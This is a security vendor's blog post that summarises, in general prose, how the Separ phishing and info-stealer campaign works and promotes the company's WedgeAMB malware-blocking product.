Over the last week, more has been made public about the Separ Malware / phishing campaign that has been making the rounds, starting at the end of January. Threatpost states that “it has affected around 200 companies and over 1,000 individuals, located mainly in Southeast Asia, the Middle East, and North America”. The effectiveness of this malware has been a result of its use of a combination of legitimate executable files and short scripts, with no attempt by the attacker to evade analysis.
Separ’s earlier variants have existed since November 2017, with info-stealers such as this being active as far back as 2013, so it’s not like this is a new malware. What has allowed this attack to become so effective is that it is launched using legitimate files that are either common within the organizations being attacked or are widely-used administrative tools; with these legitimate files and executables being abused to perform the malicious info-stealing that is the underlying goal.
The attack will start as a phishing email that contains the malicious attachment; often-times a fake pdf document passing itself off as a self-extracting executable, related to normal business activities such as quotations, shipments, etc. However, once clicked, the self-extractor runs a Visual Basic script that executes a list of short batch scripts with malicious functions; often masquerading as fake adobe-related programs. Then, it’s off to the races with the scripts changing firewall settings, stealing email and browser credentials, etc.; eventually using TFTP to upload your stolen data.
What makes this attack so successful is that it uses multiple vectors in launching its attack; many of which are not caught by the various malware solutions out on the market since the malware uses legitimate executable files in its attack. Oftentimes, even the most up-to-date malware databases will not list these files. Thankfully, there are solutions out there, such as the Wedge Advanced Malware Blocker, with its Deep Content Inspection technology, combined with AI-algorithms, that can see the whole picture and can piece together the multiple vectors of attack that this campaign uses. Using the deep learning AI-engine, WedgeAMB can catch attacks such as these in their first phase of infection by looking at the various actions of the adobe installer and seeing whether there were any malicious activities occurring, even within this legitimate executable file.
Unlike many other solutions on the market, WedgeAMB is able to reassemble all content in the network stream in real-time and block such content if its intent is malicious. This provides a clear advantage, especially when attacks such as Separ are utilizing multiple vectors; many of which might be within legitimate files and executables.
With Separ and other similar attacks on the horizon, organizations should really take a look at solutions that can “see” the whole picture and stop malicious activities in real-time before they can do any damage within their networks. If you have such Separ problems and are committed to building an infrastructure that can withstand such attacks, why don’t you e-mail us at firstname.lastname@example.org. Our great team of engineers would be very willing to help!